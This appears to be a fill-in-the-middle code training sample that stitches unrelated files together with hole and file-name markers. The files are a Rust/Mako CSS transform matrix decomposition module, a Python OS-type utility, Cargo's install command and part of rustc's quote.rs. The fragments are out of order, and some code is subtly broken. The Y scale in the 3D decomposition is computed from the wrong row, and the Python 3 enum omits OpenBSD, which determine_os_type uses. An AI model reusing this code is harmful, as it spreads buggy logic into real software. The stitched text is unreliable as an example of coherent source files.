scale.1 = -scale.1;
}
}
// Renormalize matrix to remove scale.
if scale.0 != 0.0 {
row0x *= 1. / scale.0;
row0y *= 1. / scale.0;
}
if scale.1 != 0.0 {
row1x *= 1. / scale.1;
row1y *= 1. / scale.1;
}
// Compute rotation and renormalize matrix.
let mut angle = row0y.atan2(row0x);
if angle != 0.0 {
let sn = -row0y;
let cs = row0x;
let m11 = row0x;
let m12 = row0y;
let m21 = row1x;
let m22 = row1y;
row0x = cs * m11 + sn * m21;
row0y = cs * m12 + sn * m22;
row1x = -sn * m11 + cs * m21;
row1y = -sn * m12 + cs * m22;
}
let m = InnerMatrix2D {
m11: row0x, m12: row0y,
m21: row1x, m22: row1y,
};
// Convert into degrees because our rotation functions expect it.
angle = angle.to_degrees();
MatrixDecomposed2D {
translate: translate,
scale: scale,
angle: angle,
matrix: m,
}
}
}
impl From<MatrixDecomposed2D> for ComputedMatrix {
/// Recompose a 2D matrix.
/// https://drafts.csswg.org/css-transforms/#recomposing-to-a-2d-matrix
fn from(decomposed: MatrixDecomposed2D) -> ComputedMatrix {
let mut computed_matrix = ComputedMatrix::identity();
computed_matrix.m11 = decomposed.matrix.m11;
computed_matrix.m12 = decomposed.matrix.m12;
computed_matrix.m21 = decomposed.matrix.m21;
computed_matrix.m22 = decomposed.matrix.m22;
// Translate matrix.
computed_matrix.m41 = decomposed.translate.0;
computed_matrix.m42 = decomposed.translate.1;
// Rotate matrix.
let angle = decomposed.angle.to_radians();
let cos_angle = angle.cos();
let sin_angle = angle.sin();
let mut rotate_matrix = ComputedMatrix::identity();
rotate_matrix.m11 = cos_angle;
rotate_matrix.m12 = sin_angle;
rotate_matrix.m21 = -sin_angle;
rotate_matrix.m22 = cos_angle;
// Multiplication of computed_matrix and rotate_matrix
computed_matrix = multiply(rotate_matrix, computed_matrix);
// Scale matrix.
computed_matrix.m11 *= decomposed.scale.0;
computed_matrix.m12 *= decomposed.scale.0;
computed_matrix.m21 *= decomposed.scale.1;
computed_matrix.m22 *= decomposed.scale.1;
computed_matrix
}
}
/// A 3d translation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Translate3D(f32, f32, f32);
/// A 3d scale function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Scale3D(f32, f32, f32);
/// A 3d skew function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Skew(f32, f32, f32);
/// A 3d perspective transformation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Perspective(f32, f32, f32, f32);
/// A quaternion used to represent a rotation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Quaternion(f32, f32, f32, f32);
/// A decomposed 3d matrix.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct MatrixDecomposed3D {
/// A translation function.
pub translate: Translate3D,
/// A scale function.
pub scale: Scale3D,
/// The skew component of the transformation.
pub skew: Skew,
/// The perspective component of the transformation.
pub perspective: Perspective,
/// The quaternion used to represent the rotation.
pub quaternion: Quaternion,
}
/// Decompose a 3D matrix.
/// https://drafts.csswg.org/css-transforms/#decomposing-a-3d-matrix
fn decompose_3d_matrix(mut matrix: ComputedMatrix) -> Result<MatrixDecomposed3D, ()> {
// Normalize the matrix.
if matrix.m44 == 0.0 {
return Err(());
}
let scaling_factor = matrix.m44;
% for i in range(1, 5):
% for j in range(1, 5):
matrix.m${i}${j} /= scaling_factor;
% endfor
% endfor
// perspective_matrix is used to solve for perspective, but it also provides
// an easy way to test for singularity of the upper 3x3 component.
let mut perspective_matrix = matrix;
% for i in range(1, 4):
perspective_matrix.m${i}4 = 0.0;
% endfor
perspective_matrix.m44 = 1.0;
if perspective_matrix.determinant() == 0.0 {
return Err(());
}
// First, isolate perspective.
let perspective = if matrix.m14 != 0.0 || matrix.m24 != 0.0 || matrix.m34 != 0.0 {
let right_hand_side: [f32; 4] = [
matrix.m14,
matrix.m24,
matrix.m34,
matrix.m44
];
perspective_matrix = perspective_matrix.inverse().unwrap();
// Transpose perspective_matrix
perspective_matrix = ComputedMatrix {
% for i in range(1, 5):
% for j in range(1, 5):
m${i}${j}: perspective_matrix.m${j}${i},
% endfor
% endfor
};
// Multiply right_hand_side with perspective_matrix
let mut tmp: [f32; 4] = [0.0; 4];
% for i in range(1, 5):
tmp[${i - 1}] = (right_hand_side[0] * perspective_matrix.m1${i}) +
(right_hand_side[1] * perspective_matrix.m2${i}) +
(right_hand_side[2] * perspective_matrix.m3${i}) +
(right_hand_side[3] * perspective_matrix.m4${i});
% endfor
Perspective(tmp[0], tmp[1], tmp[2], tmp[3])
} else {
Perspective(0.0, 0.0, 0.0, 1.0)
};
// Next take care of translation
let translate = Translate3D (
matrix.m41,
matrix.m42,
matrix.m43
);
// Now get scale and shear. 'row' is a 3 element array of 3 component vectors
let mut row: [[f32; 3]; 3] = [[0.0; 3]; 3];
% for i in range(1, 4):
row[${i - 1}][0] = matrix.m${i}1;
row[${i - 1}][1] = matrix.m${i}2;
row[${i - 1}][2] = matrix.m${i}3;
% endfor
// Compute X scale factor and normalize first row.
let row0len = (row[0][0] * row[0][0] + row[0][1] * row[0][1] + row[0][2] * row[0][2]).sqrt();
let mut scale = Scale3D(row0len, 0.0, 0.0);
row[0] = [row[0][0] / row0len, row[0][1] / row0len, row[0][2] / row0len];
// Compute XY shear factor and make 2nd row orthogonal to 1st.
let mut skew = Skew(dot(row[0], row[1]), 0.0, 0.0);
row[1] = combine(row[1], row[0], 1.0, -skew.0);
// Now, compute Y scale and normalize 2nd row.
let row1len = (row[0][0] * row[0][0] + row[0][1] * row[0][1] + row[0][2] * row[0][2]).sqrt();
scale.1 = row1len;
row[1] = [row[1][0] / row1len, row[1][1] / row1len, row[1][2] / row1len];
skew.0 /= scale.1;
// Compute XZ and YZ shears, orthogonalize 3rd row
skew.1 = dot(row[0], row[2]);
row[2] = combine(row[2], row[0], 1.0, -skew.1);
skew.2 = dot(row[1], row[2]);
row[2] = combine(row[2], row[1], 1.0, -skew.2);
// Next, get Z scale and normalize 3rd row.
let row2len = (row[2][0] * row[2][0] + row[2][1] * row[2][1] + row[2][2] * row[2][2]).sqrt();
scale.2 = row2len;
row[2] = [row[2][0] / row2len, row[2][1] / row2len, row[2][2] / row2len];
skew.1 /= scale.2;
skew.2 /= scale.2;
// At this point, the matrix (in rows) is orthonormal.
// Check for a coordinate system flip. If the determinant
// is -1, then negate the matrix and the scaling factors.
let pdum3 = cross(row[1], row[2]);
if dot(row[0], pdum3) < 0.0 {
% for i in range(3):
scale.${i} *= -1.0;
row[${i}][0] *= -1.0;
row[${i}][1] *= -1.0;
row[${i}][2] *= -1.0;
% endfor
}
// Now, get the rotations out
let mut quaternion = Quaternion (
0.5 * ((1.0 + row[0][0] - row[1][1] - row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 - row[0][0] + row[1][1] - row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 - row[0][0] - row[1][1] + row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 + row[0][0] + row[1][1] + row[2][2]).max(0.0)).sqrt()
);
if row[2][1] > row[1][2] {
quaternion.0 = -quaternion.0
}
if row[0][2] > row[2][0] {
quaternion.1 = -quaternion.1
}
if row[1][0] > row[0][1] {
quaternion.2 = -quaternion.2
}
Ok(MatrixDecomposed3D {
translate: translate,
scale: scale,
skew: skew,
perspective: perspective,
quaternion: quaternion
})
}
// Combine 2 point.
fn combine(a: [f32; 3], b: [f32; 3], ascl: f32, bscl: f32) -> [f32; 3] {
[
(ascl * a[0]) + (bscl * b[0]),
(ascl * a[1]) + (bscl * b[1]),
(ascl * a[2]) + (bscl * b[2])
]
}
// Dot product.
fn dot(a: [f32; 3], b: [f32; 3]) -> f32 {
a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
}
// Cross product.
fn cross(row1: [f32; 3], row2: [f32; 3]) -> [f32; 3] {
[
row1[1] * row2[2] - row1[2] * row2[1],
row1[2] * row2[0] - row1[0] * row2[2],
row1[0] * row2[1] - row1[1] * row2[0]
]
}
impl Interpolate for Translate3D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Translate3D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Scale3D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Scale3D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Skew {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Skew(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Perspective {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Perspective(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress)),
try!(self.3.interpolate(&other.3, progress))
))
}
}
impl Interpolate for MatrixDecomposed3D {
/// https://drafts.csswg.org/css-transforms/#interpolation-of-decomposed-3d-matrix-values
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let mut interpolated = *self;
// Interpolate translate, scale, skew and perspective components.
interpolated.translate = try!(self.translate.interpolate(&other.translate, progress));
interpolated.scale = try!(self.scale.interpolate(&other.scale, progress));
interpolated.skew = try!(self.skew.interpolate(&other.skew, progress));
interpolated.perspective = try!(self.perspective.interpolate(&other.perspective, progress));
// Interpolate quaternions using spherical linear interpolation (Slerp).
let mut product = self.quaternion.0 * other.quaternion.0 +
self.quaternion.1 * other.quaternion.1 +
self.quaternion.2 * other.quaternion.2 +
self.quaternion.3 * other.quaternion.3;
// Clamp product to -1.0 <= product <= 1.0
product = product.min(1.0);
product = product.max(-1.0);
if product == 1.0 {
return Ok(interpolated);
}
let theta = product.acos();
let w = (progress as f32 * theta).sin() * 1.0 / (1.0 - product * product).sqrt();
let mut a = *self;
let mut b = *other;
% for i in range(4):
a.quaternion.${i} *= (progress as f32 * theta).cos() - product * w;
b.quaternion.${i} *= w;
interpolated.quaternion.${i} = a.quaternion.${i} + b.quaternion.${i};
% endfor
Ok(interpolated)
}
}
impl From<MatrixDecomposed3D> for ComputedMatrix {
/// Recompose a 3D matrix.
/// https://drafts.csswg.org/css-transforms/#recomposing-to-a-3d-matrix
fn from(decomposed: MatrixDecomposed3D) -> ComputedMatrix {
let mut matrix = ComputedMatrix::identity();
// Apply perspective
% for i in range(1, 5):
matrix.m${i}4 = decomposed.perspective.${i - 1};
% endfor
// Apply translation
% for i in range(1, 4):
% for j in range(1, 4):
matrix.m4${i} += decomposed.translate.${j - 1} * matrix.m${j}${i};
% endfor
% endfor
// Apply rotation
let x = decomposed.quaternion.0;
let y = decomposed.quaternion.1;
let z = decomposed.quaternion.2;
let w = decomposed.quaternion.3;
// Construct a composite rotation matrix from the quaternion values
// rotationMatrix is a identity 4x4 matrix initially
let mut rotation_matrix = ComputedMatrix::identity();
rotation_matrix.m11 = 1.0 - 2.0 * (y * y + z * z);
rotation_matrix.m12 = 2.0 * (x * y + z * w);
rotation_matrix.m13 = 2.0 * (x * z - y * w);
rotation_matrix.m21 = 2.0 * (x * y - z * w);
rotation_matrix.m22 = 1.0 - 2.0 * (x * x + z * z);
rotation_matrix.m23 = 2.0 * (y * z + x * w);
rotation_matrix.m31 = 2.0 * (x * z + y * w);
rotation_matrix.m32 = 2.0 * (y * z - x * w);
rotation_matrix.m33 = 1.0 - 2.0 * (x * x + y * y);
matrix = multiply(rotation_matrix, matrix);
// Apply skew
let mut temp = ComputedMatrix::identity();
if decomposed.skew.2 != 0.0 {
temp.m32 = decomposed.skew.2;
matrix = multiply(matrix, temp);
}
if decomposed.skew.1 != 0.0 {
temp.m32 = 0.0;
temp.m31 = decomposed.skew.1;
matrix = multiply(matrix, temp);
}
if decomposed.skew.0 != 0.0 {
temp.m31 = 0.0;
temp.m21 = decomposed.skew.0;
matrix = multiply(matrix, temp);
}
// Apply scale
% for i in range(1, 4):
% for j in range(1, 4):
matrix.m${i}${j} *= decomposed.scale.${i - 1};
% endfor
% endfor
matrix
}
}
// Multiplication of two 4x4 matrices.
fn multiply(a: ComputedMatrix, b: ComputedMatrix) -> ComputedMatrix {
let mut a_clone = a;
% for i in range(1, 5):
% for j in range(1, 5):
a_clone.m${i}${j} = (a.m${i}1 * b.m1${j}) +
(a.m${i}2 * b.m2${j}) +
(a.m${i}3 * b.m3${j}) +
(a.m${i}4 * b.m4${j});
% endfor
% endfor
a_clone
}
impl ComputedMatrix {
fn is_3d(&self) -> bool {
self.m13 != 0.0 || self.m14 != 0.0 ||
self.m23 != 0.0 || self.m24 != 0.0 ||
self.m31 != 0.0 || self.m32 != 0.0 || self.m33 != 1.0 || self.m34 != 0.0 ||
self.m43 != 0.0 || self.m44 != 1.0
}
fn determinant(&self) -> CSSFloat {
self.m14 * self.m23 * self.m32 * self.m41 -
self.m13 * self.m24 * self.m32 * self.m41 -
self.m14 * self.m22 * self.m33 * self.m41 +
self.m12 * self.m24 * self.m33 * self.m41 +
self.m13 * self.m22 * self.m34 * self.m41 -
self.m12 * self.m23 * self.m34 * self.m41 -
self.m14 * self.m23 * self.m31 * self.m42 +
self.m13 * self.m24 * self.m31 * self.m42 +
self.m14 * self.m21 * self.m33 * self.m42 -
self.m11 * self.m24 * self.m33 * self.m42 -
self.m13 * self.m21 * self.m34 * self.m42 +
self.m11 * self.m23 * self.m34 * self.m42 +
self.m14 * self.m22 * self.m31 * self.m43 -
self.m12 * self.m24 * self.m31 * self.m43 -
self.m14 * self.m21 * self.m32 * self.m43 +
self.m11 * self.m24 * self.m32 * self.m43 +
self.m12 * self.m21 * self.m34 * self.m43 -
self.m11 * self.m22 * self.m34 * self.m43 -
self.m13 * self.m22 * self.m31 * self.m44 +
self.m12 * self.m23 * self.m31 * self.m44 +
self.m13 * self.m21 * self.m32 * self.m44 -
self.m11 * self.m23 * self.m32 * self.m44 -
self.m12 * self.m21 * self.m33 * self.m44 +
self.m11 * self.m22 * self.m33 * self.m44
}
fn inverse(&self) -> Option<ComputedMatrix> {
let mut det = self.determinant();
if det == 0.0 {
return None;
}
det = 1.0 / det;
let x = ComputedMatrix {
m11: det *
(self.m23*self.m34*self.m42 - self.m24*self.m33*self.m42 +
self.m24*self.m32*self.m43 - self.m22*self.m34*self.m43 -
self.m23*self.m32*self.m44 + self.m22*self.m33*self.m44),
m12: det *
(self.m14*self.m33*self.m42 - self.m13*self.m34*self.m42 -
self.m14*self.m32*self.m43 + self.m12*self.m34*self.m43 +
self.m13*self.m32*self.m44 - self.m12*self.m33*self.m44),
m13: det *
(self.m13*self.m24*self.m42 - self.m14*self.m23*self.m42 +
self.m14*self.m22*self.m43 - self.m12*self.m24*self.m43 -
self.m13*self.m22*self.m44 + self.m12*self.m23*self.m44),
m14: det *
(self.m14*self.m23*self.m32 - self.m13*self.m24*self.m32 -
self.m14*self.m22*self.m33 + self.m12*self.m24*self.m33 +
self.m13*self.m22*self.m34 - self.m12*self.m23*self.m34),
m21: det *
(self.m24*self.m33*self.m41 - self.m23*self.m34*self.m41 -
self.m24*self.m31*self.m43 + self.m21*self.m34*self.m43 +
self.m23*self.m31*self.m44 - self.m21*self.m33*self.m44),
m22: det *
(self.m13*self.m34*self.m41 - self.m14*self.m33*self.m41 +
self.m14*self.m31*self.m43 - self.m11*self.m34*self.m43 -
self.m13*self.m31*self.m44 + self.m11*self.m33*self.m44),
m23: det *
(self.m14*self.m23*self.m41 - self.m13*self.m24*self.m41 -
self.m14*self.m21*self.m43 + self.m11*self.m24*self.m43 +
self.m13*self.m21*self.m44 - self.m11*self.m23*self.m44),
m24: det *
(self.m13*self.m24*self.m31 - self.m14*self.m23*self.m31 +
self.m14*self.m21*self.m33 - self.m11*self.m24*self.m33 -
self.m13*self.m21*self.m34 + self.m11*self.m23*self.m34),
m31: det *
(self.m22*self.m34*self.m41 - self.m24*self.m32*self.m41 +
self.m24*self.m31*self.m42 - self.m21*self.m34*self.m42 -
self.m22*self.m31*self.m44 + self.m21*self.m32*self.m44),
m32: det *
(self.m14*self.m32*self.m41 - self.m12*self.m34*self.m41 -
self.m14*self.m31*self.m42 + self.m11*self.m34*self.m42 +
self.m12*self.m31*self.m44 - self.m11*self.m32*self.m44),
m33: det *
(self.m12*self.m24*self.m41 - self.m14*self.m22*self.m41 +
self.m14*self.m21*self.m42 - self.m11*self.m24*self.m42 -
self.m12*self.m21*self.m44 + self.m11*self.m22*self.m44),
m34: det *
(self.m14*self.m22*self.m31 - self.m12*self.m24*self.m31 -
self.m14*self.m21*self.m32 + self.m11*self.m24*self.m32 +
self.m12*self.m21*self.m34 - self.m11*self.m22*self.m34),
m41: det *
(self.m23*self.m32*self.m41 - self.m22*self.m33*self.m41 -
self.m23*self.m31*self.m42 + self.m21*self.m33*self.m42 +
self.m22*self.m31*self.m43 - self.m21*self.m32*self.m43),
m42: det *
(self.m12*self.m33*self.m41 - self.m13*self.m32*self.m41 +
self.m13*self.m31*self.m42 - self.m11*self.m33*self.m42 -
self.m12*self.m31*self.m43 + self.m11*self.m32*self.m43),
m43: det *
(self.m13*self.m22*self.m41 - self.m12*self.m23*self.m41 -
self.m13*self.m21*self.m42 + self.m11*self.m23*self.m42 +
self.m12*self.m21*self.m43 - self.m11*self.m22*self.m43),
m44: det *
(self.m12*self.m23*self.m31 - self.m13*self.m22*self.m31 +
self.m13*self.m21*self.m32 - self.m11*self.m23*self.m32 -
self.m12*self.m21*self.m33 + self.m11*self.m22*self.m33),
};
Some(x)
}
}
/// https://drafts.csswg.org/css-transforms/#interpolation-of-transforms
impl Interpolate for TransformList {
#[inline]
fn interpolate(&self, other: &TransformList, progress: f64) -> Result<Self, ()> {
// http://dev.w3.org/csswg/css-transforms/#interpolation-of-transforms
let result = match (&self.0, &other.0) {
(&Some(ref from_list), &Some(ref to_list)) => {
// Two lists of transforms
interpolate_transform_list(from_list, &to_list, progress)
}
(&Some(ref from_list), &None) => {
// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
let to_list = build_identity_transform_list(from_list);
interpolate_transform_list(from_list, &to_list, progress)
}
(&None, &Some(ref to_list)) => {
// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
let from_list = build_identity_transform_list(to_list);
interpolate_transform_list(&from_list, to_list, progress)
}
_ => {
// http://dev.w3.org/csswg/css-transforms/#none-none-animation
TransformList(None)
}
};
Ok(result)
}
}
% endif<|fim▁end|> | let iz = fz.interpolate(&tz, progress).unwrap();
result.push(TransformOperation::Translate(ix, iy, iz)); |
<|file_name|>utilsOsType.py<|end_file_name|><|fim▁begin|>""" Utility module to determine the OS Python running on
--------------------------------------------------------------------------
File: utilsOsType.py
Overview: Python module to supply functions and an enumeration to
help determine the platform type, bit size and OS currently
being used.
--------------------------------------------------------------------------
"""
<|fim▁hole|>
# In-house modules:
# Instantiations:
# Enumerations:
#-----------------------------------------------------------------------------
# Details: Class to implement a 'C' style enumeration type.
# Gotchas: None.
# Authors: Illya Rudkin 28/11/2013.
# Changes: None.
#--
if sys.version_info.major >= 3:
from enum import Enum
class EnumOsType(Enum):
Unknown = 0
Darwin = 1
FreeBSD = 2
Linux = 3
NetBSD = 4
Windows = 5
kFreeBSD = 6
else:
class EnumOsType(object):
values = ["Unknown",
"Darwin",
"FreeBSD",
"Linux",
"NetBSD",
"OpenBSD",
"Windows",
"kFreeBSD"]
class __metaclass__(type):
#++----------------------------------------------------------------
# Details: Fn acts as an enumeration.
# Args: vName - (R) Enumeration to match.
# Returns: Int - Matching enumeration/index.
# Throws: None.
#--
def __getattr__(cls, vName):
return cls.values.index(vName)
#++---------------------------------------------------------------------------
# Details: Reverse fast lookup of the values list.
# Args: vI - (R) Index / enumeration.
# Returns: Str - text description matching enumeration.
# Throws: None.
#--
def name_of(cls, vI):
return EnumOsType.values[vI]
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#++---------------------------------------------------------------------------
# Details: Determine what operating system is currently running on.
# Args: None.
# Returns: EnumOsType - The OS type being used ATM.
# Throws: None.
#--
def determine_os_type():
eOSType = EnumOsType.Unknown
strOS = sys.platform
if strOS == "darwin":
eOSType = EnumOsType.Darwin
elif strOS.startswith("freebsd"):
eOSType = EnumOsType.FreeBSD
elif strOS.startswith("linux"):
eOSType = EnumOsType.Linux
elif strOS.startswith("netbsd"):
eOSType = EnumOsType.NetBSD
elif strOS.startswith("openbsd"):
eOSType = EnumOsType.OpenBSD
elif strOS == "win32":
eOSType = EnumOsType.Windows
elif strOS.startswith("gnukfreebsd"):
eOSType = EnumOsType.kFreeBSD
return eOSType<|fim▁end|> | # Python modules:
import sys # Provide system information
# Third party modules: |
<|file_name|>install.rs<|end_file_name|><|fim▁begin|>use std::path::Path;
use cargo::ops;
use cargo::core::{SourceId, GitReference};
use cargo::util::{CliResult, Config, ToUrl, human};
#[derive(RustcDecodable)]
struct Options {
flag_jobs: Option<u32>,
flag_features: Vec<String>,
flag_no_default_features: bool,
flag_debug: bool,
flag_bin: Vec<String>,
flag_example: Vec<String>,
flag_verbose: bool,
flag_quiet: bool,
flag_color: Option<String>,
flag_root: Option<String>,
flag_list: bool,
arg_crate: Option<String>,
flag_vers: Option<String>,
flag_git: Option<String>,
flag_branch: Option<String>,
flag_tag: Option<String>,
flag_rev: Option<String>,
flag_path: Option<String>,
}
pub const USAGE: &'static str = "
Install a Rust binary
Usage:
cargo install [options] [<crate>]
cargo install [options] --list
Specifying what crate to install:
--vers VERS Specify a version to install from crates.io
--git URL Git URL to install the specified crate from
--branch BRANCH Branch to use when installing from git
--tag TAG Tag to use when installing from git
--rev SHA Specific commit to use when installing from git
--path PATH Filesystem path to local crate to install
Build and install options:
-h, --help Print this message<|fim▁hole|> -j N, --jobs N The number of jobs to run in parallel
--features FEATURES Space-separated list of features to activate
--no-default-features Do not build the `default` feature
--debug Build in debug mode instead of release mode
--bin NAME Only install the binary NAME
--example EXAMPLE Install the example EXAMPLE instead of binaries
--root DIR Directory to install packages into
-v, --verbose Use verbose output
-q, --quiet Less output printed to stdout
--color WHEN Coloring: auto, always, never
This command manages Cargo's local set of install binary crates. Only packages
which have [[bin]] targets can be installed, and all binaries are installed into
the installation root's `bin` folder. The installation root is determined, in
order of precedence, by `--root`, `$CARGO_INSTALL_ROOT`, the `install.root`
configuration key, and finally the home directory (which is either
`$CARGO_HOME` if set or `$HOME/.cargo` by default).
There are multiple sources from which a crate can be installed. The default
location is crates.io but the `--git` and `--path` flags can change this source.
If the source contains more than one package (such as crates.io or a git
repository with multiple crates) the `<crate>` argument is required to indicate
which crate should be installed.
Crates from crates.io can optionally specify the version they wish to install
via the `--vers` flags, and similarly packages from git repositories can
optionally specify the branch, tag, or revision that should be installed. If a
crate has multiple binaries, the `--bin` argument can selectively install only
one of them, and if you'd rather install examples the `--example` argument can
be used as well.
The `--list` option will list all installed packages (and their versions).
";
pub fn execute(options: Options, config: &Config) -> CliResult<Option<()>> {
try!(config.shell().set_verbosity(options.flag_verbose, options.flag_quiet));
try!(config.shell().set_color_config(options.flag_color.as_ref().map(|s| &s[..])));
let compile_opts = ops::CompileOptions {
config: config,
jobs: options.flag_jobs,
target: None,
features: &options.flag_features,
no_default_features: options.flag_no_default_features,
spec: &[],
exec_engine: None,
mode: ops::CompileMode::Build,
release: !options.flag_debug,
filter: ops::CompileFilter::new(false, &options.flag_bin, &[],
&options.flag_example, &[]),
target_rustc_args: None,
};
let source = if let Some(url) = options.flag_git {
let url = try!(url.to_url().map_err(human));
let gitref = if let Some(branch) = options.flag_branch {
GitReference::Branch(branch)
} else if let Some(tag) = options.flag_tag {
GitReference::Tag(tag)
} else if let Some(rev) = options.flag_rev {
GitReference::Rev(rev)
} else {
GitReference::Branch("master".to_string())
};
SourceId::for_git(&url, gitref)
} else if let Some(path) = options.flag_path {
try!(SourceId::for_path(Path::new(&path)))
} else {
try!(SourceId::for_central(config))
};
let krate = options.arg_crate.as_ref().map(|s| &s[..]);
let vers = options.flag_vers.as_ref().map(|s| &s[..]);
let root = options.flag_root.as_ref().map(|s| &s[..]);
if options.flag_list {
try!(ops::install_list(root, config));
} else {
try!(ops::install(root, krate, &source, vers, &compile_opts));
}
Ok(None)
}<|fim▁end|> | |
<|file_name|>quote.rs<|end_file_name|><|fim▁begin|>// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use ast;
use codemap::Span;
use ext::base::ExtCtxt;
use ext::base;
use ext::build::AstBuilder;
use parse::token::*;
use parse::token;
use ptr::P;
/// Quasiquoting works via token trees.
///
/// This is registered as a set of expression syntax extension called quote!
/// that lifts its argument token-tree to an AST representing the
/// construction of the same token tree, with token::SubstNt interpreted
/// as antiquotes (splices).
pub mod rt {
use ast;
use codemap::Spanned;
use ext::base::ExtCtxt;
use parse::token;
use parse;
use ptr::P;
use std::rc::Rc;
use ast::{TokenTree, Expr};
pub use parse::new_parser_from_tts;
pub use codemap::{BytePos, Span, dummy_spanned, DUMMY_SP};
pub trait ToTokens {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree>;
}
impl ToTokens for TokenTree {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec!(self.clone())
}
}
impl<T: ToTokens> ToTokens for Vec<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
self.iter().flat_map(|t| t.to_tokens(cx).into_iter()).collect()
}
}
impl<T: ToTokens> ToTokens for Spanned<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
// FIXME: use the span?
self.node.to_tokens(cx)
}
}
impl<T: ToTokens> ToTokens for Option<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
match self {
&Some(ref t) => t.to_tokens(cx),
&None => Vec::new(),
}
}
}
impl ToTokens for ast::Ident {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Ident(*self, token::Plain))]
}
}
impl ToTokens for ast::Path {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtPath(Box::new(self.clone()))))]
}
}
impl ToTokens for ast::Ty {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtTy(P(self.clone()))))]
}
}
impl ToTokens for ast::Block {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtBlock(P(self.clone()))))]
}
}
impl ToTokens for P<ast::Item> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtItem(self.clone())))]
}
}
impl ToTokens for P<ast::ImplItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtImplItem(self.clone())))]
}
}
impl ToTokens for P<ast::TraitItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtTraitItem(self.clone())))]
}
}
impl ToTokens for P<ast::Stmt> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtStmt(self.clone())))]
}
}
impl ToTokens for P<ast::Expr> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtExpr(self.clone())))]
}
}
impl ToTokens for P<ast::Pat> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtPat(self.clone())))]
}
}
impl ToTokens for ast::Arm {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtArm(self.clone())))]
}
}
macro_rules! impl_to_tokens_slice {
($t: ty, $sep: expr) => {
impl ToTokens for [$t] {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let mut v = vec![];
for (i, x) in self.iter().enumerate() {
if i > 0 {
v.push_all(&$sep);
}
v.extend(x.to_tokens(cx));
}
v
}
}
};
}
impl_to_tokens_slice! { ast::Ty, [ast::TtToken(DUMMY_SP, token::Comma)] }
impl_to_tokens_slice! { P<ast::Item>, [] }
impl ToTokens for P<ast::MetaItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtMeta(self.clone())))]
}
}
impl ToTokens for ast::Attribute {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let mut r = vec![];
// FIXME: The spans could be better
r.push(ast::TtToken(self.span, token::Pound));
if self.node.style == ast::AttrInner {
r.push(ast::TtToken(self.span, token::Not));
}
